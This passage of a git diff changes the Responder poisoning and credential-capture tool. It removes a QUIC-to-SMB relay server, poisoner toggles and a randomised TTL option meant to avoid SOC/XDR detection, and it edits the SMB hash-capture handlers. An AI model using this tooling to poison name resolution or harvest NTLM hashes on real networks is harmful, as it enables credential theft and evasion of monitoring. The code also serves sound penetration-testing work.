-class QUIC(QuicConnectionProtocol):
- def __init__(self, *args, target_address=None, **kwargs):
- super().__init__(*args, **kwargs)
- self.tcp_connections = {} # stream_id -> (reader, writer)
- self.target_address = target_address or "localhost"
-
- def quic_event_received(self, event):
- if isinstance(event, StreamDataReceived):
- asyncio.create_task(self.handle_stream_data(event.stream_id, event.data))
- elif isinstance(event, StreamReset) or isinstance(event, ConnectionTerminated):
- # Only try to close connections if we have any
- if self.tcp_connections:
- asyncio.create_task(self.close_all_tcp_connections())
-
- async def handle_stream_data(self, stream_id, data):
- if stream_id not in self.tcp_connections:
- # Create a new TCP connection to the target interface:445
- try:
- reader, writer = await asyncio.open_connection(self.target_address, 445)
- self.tcp_connections[stream_id] = (reader, writer)
-
- # Start task to read from TCP and write to QUIC
- asyncio.create_task(self.tcp_to_quic(stream_id, reader))
-
- logging.info(f"[*] Connected to {self.target_address}:445\n[*] Starting relaying process...")
- print(text("[QUIC] Forwarding QUIC connection to SMB server"))
- except Exception as e:
- logging.error(f"[!] Error connecting to {self.target_address}:445: {e}")
- return
-
- # Forward data from QUIC to TCP
- try:
- _, writer = self.tcp_connections[stream_id]
- writer.write(data)
- await writer.drain()
- except Exception as e:
- logging.error(f"[!] Error writing to TCP: {e}")
- await self.close_tcp_connection(stream_id)
-
- async def tcp_to_quic(self, stream_id, reader):
- try:
- while True:
- data = await reader.read(BUFFER_SIZE)
- if not data:
- break
-
- self._quic.send_stream_data(stream_id, data)
- self.transmit()
- except Exception as e:
- logging.error(f"[!] Error reading from TCP: {e}")
- finally:
- await self.close_tcp_connection(stream_id)
-
- async def close_tcp_connection(self, stream_id):
- if stream_id in self.tcp_connections:
- _, writer = self.tcp_connections[stream_id]
- writer.close()
- await writer.wait_closed()
- del self.tcp_connections[stream_id]
-
- async def close_all_tcp_connections(self):
- try:
- # Make a copy of the keys to avoid modification during iteration
- stream_ids = list(self.tcp_connections.keys())
- for stream_id in stream_ids:
- try:
- await self.close_tcp_connection(stream_id)
- except KeyError:
- # Silently ignore if the stream ID no longer exists
- pass
- except Exception as e:
- # Catch any other exceptions that might occur
- logging.debug(f"[!] Error closing TCP connections: {e}")
-
-async def start_quic_server(listen_interface, cert_path, key_path):
- # Configure QUIC
- configuration = QuicConfiguration(
- alpn_protocols=["smb"],
- is_client=False,
- )
-
- # Load certificate and private key
- try:
- configuration.load_cert_chain(cert_path, key_path)
- except Exception as e:
- logging.error(f"[!] Could not load {cert_path} and {key_path}: {e}")
- return
-
- # Resolve interfaces to IP addresses
- listen_ip = listen_interface
- if not is_ip_address(listen_interface):
- listen_ip = get_interface_ip(listen_interface)
- if not listen_ip:
- logging.error(f"[!] Could not resolve IP address for interface {listen_interface}")
- return
-
- target_ip = listen_interface
- if not is_ip_address(listen_interface):
- target_ip = get_interface_ip(listen_interface)
- if not target_ip:
- logging.error(f"[!] Could not resolve IP address for interface {listen_interface}")
- return
-
- # Start QUIC server with correct protocol factory
- server = await serve(
- host=listen_ip,
- port=443,
- configuration=configuration,
- create_protocol=lambda *args, **kwargs: QUIC(
- *args,
- target_address=target_ip,
- **kwargs
- )
- )
-
- logging.info(f"[*] Started listening on {listen_ip}:443 (UDP)")
- logging.info(f"[*] Forwarding connections to {target_ip}:445 (TCP)")
-
- # Keep the server running forever
- await asyncio.Future()
-
-
-def is_ip_address(address):
- """Check if a string is a valid IP address."""
- import socket
- try:
- socket.inet_pton(socket.AF_INET, address)
- return True
- except socket.error:
- try:
- socket.inet_pton(socket.AF_INET6, address)
- return True
- except socket.error:
- return False
diff --git a/servers/RPC.py b/servers/RPC.py
index c8074ac..ce931f5 100644
--- a/servers/RPC.py
+++ b/servers/RPC.py
@@ -144,7 +144,7 @@ class RPCMap(BaseRequestHandler):
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
- print(color("[*] [DCE-RPC Mapper] Redirected %-15s to DSRUAPI auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
+ print(color("[*] [DCE-RPC Mapper] Redirected %-15sto DSRUAPI auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
self.request.close()
#LSARPC
@@ -155,7 +155,7 @@ class RPCMap(BaseRequestHandler):
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
- print(color("[*] [DCE-RPC Mapper] Redirected %-15s to LSARPC auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
+ print(color("[*] [DCE-RPC Mapper] Redirected %-15sto LSARPC auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
self.request.close()
#WINSPOOL
@@ -166,7 +166,7 @@ class RPCMap(BaseRequestHandler):
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
- print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WINSPOOL auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
+ print(color("[*] [DCE-RPC Mapper] Redirected %-15sto WINSPOOL auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
self.request.close()
#NetLogon
@@ -180,7 +180,7 @@ class RPCMap(BaseRequestHandler):
#RPC.calculate()
#self.request.send(NetworkSendBufferPython2or3(str(RPC)))
#data = self.request.recv(1024)
- #print(color("[*] [DCE-RPC Mapper] Redirected %-15s to NETLOGON auth server." % (self.client_address[0]), 3, 1))
+ #print(color("[*] [DCE-RPC Mapper] Redirected %-15sto NETLOGON auth server." % (self.client_address[0]), 3, 1))
except Exception:
self.request.close()
diff --git a/servers/SMB.py b/servers/SMB.py
index 2110927..b93ebb7 100644
--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -239,11 +239,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
## Session Setup 3 answer SMBv2.
if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe':
ParseSMBHash(data, self.client_address[0], Challenge)
- if settings.Config.ErrorCode:
- ntstatus="\x6d\x00\x00\xc0"
- else:
- ntstatus="\x22\x00\x00\xc0"
- head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus=ntstatus, SessionID=GrabSessionID(data).decode('latin-1'))
+ head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data).decode('latin-1'))
t = SMB2Session2Data()
packet1 = str(head)+str(t)
buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
@@ -361,11 +357,7 @@ class SMB1LM(BaseRequestHandler): # SMB Server class, old version
self.request.send(NetworkSendBufferPython2or3(Buffer))
else:
ParseLMNTHash(data,self.client_address[0], Challenge)
- if settings.Config.ErrorCode:
- ntstatus="\x6d\x00\x00\xc0"
- else:
- ntstatus="\x22\x00\x00\xc0"
- head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode=ntstatus,pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+ head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Packet = str(head) + str(SMBSessEmpty())
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
self.request.send(NetworkSendBufferPython2or3(Buffer))
diff --git a/servers/WinRM.py b/servers/WinRM.py
index bf730e4..dcdd013 100644
--- a/servers/WinRM.py
+++ b/servers/WinRM.py
@@ -180,5 +180,6 @@ class WinRM(BaseRequestHandler):
except:
self.request.close()
+ raise
pass
diff --git a/settings.py b/settings.py
index d8e7f04..20f1672 100644
--- a/settings.py
+++ b/settings.py
@@ -23,7 +23,7 @@ import subprocess
from utils import *
-__version__ = 'Responder 3.1.6.0'
+__version__ = 'Responder 3.1.4.0'
class Settings:
@@ -114,17 +114,11 @@ class Settings:
# Config parsing
config = ConfigParser.ConfigParser()
config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
-
- # Poisoners
- self.LLMNR_On_Off = self.toBool(config.get('Responder Core', 'LLMNR'))
- self.NBTNS_On_Off = self.toBool(config.get('Responder Core', 'NBTNS'))
- self.MDNS_On_Off = self.toBool(config.get('Responder Core', 'MDNS'))
-
+
# Servers
self.HTTP_On_Off = self.toBool(config.get('Responder Core', 'HTTP'))
self.SSL_On_Off = self.toBool(config.get('Responder Core', 'HTTPS'))
self.SMB_On_Off = self.toBool(config.get('Responder Core', 'SMB'))
- self.QUIC_On_Off = self.toBool(config.get('Responder Core', 'QUIC'))
self.SQL_On_Off = self.toBool(config.get('Responder Core', 'SQL'))
self.FTP_On_Off = self.toBool(config.get('Responder Core', 'FTP'))
self.POP_On_Off = self.toBool(config.get('Responder Core', 'POP'))
@@ -173,28 +167,7 @@ class Settings:
self.DHCP_DNS = options.DHCP_DNS
self.ExternalIP6 = options.ExternalIP6
self.Quiet_Mode = options.Quiet
- self.AnswerName = options.AnswerName
- self.ErrorCode = options.ErrorCode
- # TTL blacklist. Known to be detected by SOC / XDR
- TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]
- # Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py)
- if options.TTL is None:
- self.TTL = None
-
- # Random TTL
- elif options.TTL.upper() == "RANDOM":
- TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x'))
- if TTL in TTL_blacklist:
- TTL = int.from_bytes(TTL, "big")+1
- TTL = int.to_bytes(TTL, 4)
- self.TTL = TTL.decode('utf-8')
- else:
- self.TTL = bytes.fromhex("000000"+options.TTL).decode('utf-8')
-
- #Do we have IPv6 for real?
- self.IPv6 = utils.Probe_IPv6_socket()
-
if self.Interface == "ALL":
self.Bind_To_ALL = True
else:
@@ -287,7 +260,6 @@ class Settings:
self.RespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]))
self.RespondToName = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')]))
self.DontRespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]))
- self.DontRespondToTLD = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToTLD').strip().split(',')]))
self.DontRespondToName_= list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]))
#add a .local to all provided DontRespondToName
self.MDNSTLD = ['.LOCAL']
@@ -360,12 +332,10 @@ class Settings:
NetworkCard = "Error fetching Network Interfaces:", ex
pass
try:
- p = subprocess.Popen('resolvectl', stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
- DNS = p.stdout.read()
- except:
- p = subprocess.Popen(['cat', '/etc/resolv.conf'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
- DNS = p.stdout.read()
-
+ DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
+ except subprocess.CalledProcessError as ex:
+ DNS = "Error fetching DNS configuration:", ex
+ pass
try:
RoutingInfo = subprocess.check_output(["netstat", "-rn"])
except:
@@ -378,7 +348,7 @@ class Settings:
Message = "%s\nCurrent environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(utils.HTTPCurrentDate(), NetworkCard.decode('latin-1'),DNS.decode('latin-1'),RoutingInfo.decode('latin-1'))
try:
utils.DumpConfig(self.ResponderConfigDump, Message)
- #utils.DumpConfig(self.ResponderConfigDump,str(self))
+ utils.DumpConfig(self.ResponderConfigDump,str(self))
except AttributeError as ex:
print("Missing Module:", ex)
pass
diff --git a/tools/RunFinger.py b/tools/RunFinger.py
index d291fa7..317f97b 100755
--- a/tools/RunFinger.py
+++ b/tools/RunFinger.py
@@ -106,7 +106,7 @@ def ParseNegotiateSMB2Ans(data):
def SMB2SigningMandatory(data):
global SMB2signing
- if data[70:71] == "\x03":
+ if data[70:71] == b"\x03":
SMB2signing = "True"
else:
SMB2signing = "False"
@@ -123,7 +123,7 @@ def WorkstationFingerPrint(data):
b"\x06\x01" :"Windows 7/Server 2008R2",
b"\x06\x02" :"Windows 8/Server 2012",
b"\x06\x03" :"Windows 8.1/Server 2012R2",
- b"\x0A\x00" :"Windows 10/Server 2016/2022 (check build)",
+ b"\x0A\x00" :"Windows 10/Server 2016/2019 (check build)",
}.get(data, 'Other than Microsoft')
def GetOsBuildNumber(data):
@@ -201,7 +201,7 @@ def IsDCVuln(t, host):
#####################
def IsSigningEnabled(data):
- if data[39:40] == "\x0f":
+ if data[39:40] == b"\x0f":
return 'True'
else:
return 'False'
@@ -251,6 +251,7 @@ def DomainGrab(Host):
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
+ s.close()
if data[8:10] == b'\x72\x00':
return GetHostnameAndDomainName(data)
except IOError as e:
@@ -358,7 +359,7 @@ def ConnectAndChoseSMB(host):
if not data:
break
except Exception:
- return False
+ pass
else:
return False
diff --git a/tools/RunFingerPackets.py b/tools/RunFingerPackets.py
index 829c542..651849b 100644
--- a/tools/RunFingerPackets.py
+++ b/tools/RunFingerPackets.py
@@ -1,5 +1,4 @@
-import random, struct, sys, os
-from os import urandom
+import random, struct, sys
from socket import *
from time import sleep
from odict import OrderedDict
@@ -523,7 +522,7 @@ class SMBv2Negotiate(Packet):
("SecurityMode", "\x01\x00"),
("Reserved","\x00\x00"),
("Capabilities","\x00\x00\x00\x00"),
- ("ClientGUID", urandom(16).decode('latin-1')),
+ ("ClientGUID","\xd5\xa1\x5f\x6e\x9a\x75\xe1\x11\x87\x82\x00\x01\x4a\xf1\x18\xee"),
("ClientStartTime","\x00\x00\x00\x00\x00\x00\x00\x00"),
("Dialect1","\x02\x02"),
("Dialect2","\x10\x02"),
diff --git a/utils.py b/utils.py
index b77ccbb..51ecb93 100644
--- a/utils.py
+++ b/utils.py
@@ -29,12 +29,7 @@ try:
import netifaces
except:
sys.exit('You need to install python-netifaces or run Responder with python3...\nTry "apt-get install python-netifaces" or "pip install netifaces"')
-
-try:
- import aioquic
-except:
- sys.exit('You need to install aioquic...\nTry "apt-get install python-aioquic" or "pip install aioquic"')
-
+
from calendar import timegm
def if_nametoindex2(name):
@@ -127,10 +122,7 @@ def RespondToThisIP(ClientIp):
return False
def RespondToThisName(Name):
-
- if [i for i in settings.Config.DontRespondToTLD if Name.upper().endswith(i)]:
- return False
- elif settings.Config.RespondToName and Name.upper() not in settings.Config.RespondToName:
+ if settings.Config.RespondToName and Name.upper() not in settings.Config.RespondToName:
return False
elif Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
if Name.upper() not in settings.Config.DontRespondToName:
@@ -227,17 +219,7 @@ def FindLocalIP(Iface, OURIP):
print(color("[!] Error: %s: Interface not found" % Iface, 1))
sys.exit(-1)
-def Probe_IPv6_socket():
- """Return true is IPv6 sockets are really supported, and False when IPv6 is not supported."""
- if not socket.has_ipv6:
- return False
- try:
- with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
- s.bind(("::1", 0))
- return True
- except:
- return False
-
+
def FindLocalIP6(Iface, OURIP):
if Iface == 'ALL':
return '::'
@@ -252,6 +234,7 @@ def FindLocalIP6(Iface, OURIP):
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect((randIP+':80', 1))
IP = s.getsockname()[0]
+ print('IP is: %s'%IP)
return IP
except:
try:
@@ -485,18 +468,26 @@ def banner():
])
print(banner)
+ print("\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__)
+ print('')
+ print(" To support this project:")
+ print(" Github -> https://github.com/sponsors/lgandx")
+ print(" Paypal -> https://paypal.me/PythonResponder")
+ print('')
+ print(" Author: Laurent Gaffie (laurent.gaffie@gmail.com)")
+ print(" To kill this script hit CTRL-C")
print('')
def StartupMessage():
enabled = color('[ON]', 2, 1)
disabled = color('[OFF]', 1, 1)
- print(color("[*] ", 2, 1)+"Sponsor Responder: https://paypal.me/PythonResponder")
+
print('')
print(color("[+] ", 2, 1) + "Poisoners:")
- print(' %-27s' % "LLMNR" + (enabled if (settings.Config.AnalyzeMode == False and settings.Config.LLMNR_On_Off) else disabled))
- print(' %-27s' % "NBT-NS" + (enabled if (settings.Config.AnalyzeMode == False and settings.Config.NBTNS_On_Off) else disabled))
- print(' %-27s' % "MDNS" + (enabled if (settings.Config.AnalyzeMode == False and settings.Config.MDNS_On_Off) else disabled))
+ print(' %-27s' % "LLMNR" + (enabled if settings.Config.AnalyzeMode == False else disabled))
+ print(' %-27s' % "NBT-NS" + (enabled if settings.Config.AnalyzeMode == False else disabled))
+ print(' %-27s' % "MDNS" + (enabled if settings.Config.AnalyzeMode == False else disabled))
print(' %-27s' % "DNS" + enabled)
print(' %-27s' % "DHCP" + (enabled if settings.Config.DHCP_On_Off else disabled))
print('')
@@ -559,20 +550,10 @@ def StartupMessage():
print(' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1))
if len(settings.Config.DontRespondToName):
print(' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1))
- if len(settings.Config.DontRespondToTLD):
- print(' %-27s' % "Don't Respond To MDNS TLD" + color(str(settings.Config.DontRespondToTLD), 5, 1))
- if settings.Config.TTL == None:
- print(' %-27s' % "TTL for poisoned response "+ color('[default]', 5, 1))
- else:
- print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1))
print('')
print(color("[+] ", 2, 1) + "Current Session Variables:")
print(' %-27s' % "Responder Machine Name" + color('[%s]' % settings.Config.MachineName, 5, 1))
print(' %-27s' % "Responder Domain Name" + color('[%s]' % settings.Config.DomainName, 5, 1))
print(' %-27s' % "Responder DCE-RPC Port " + color('[%s]' % settings.Config.RPCPort, 5, 1))
-
- #credits
- print('')
- print(color("[*] ", 2, 1)+"Version: "+settings.__version__)
- print(color("[*] ", 2, 1)+"Author: Laurent Gaffie, ")
+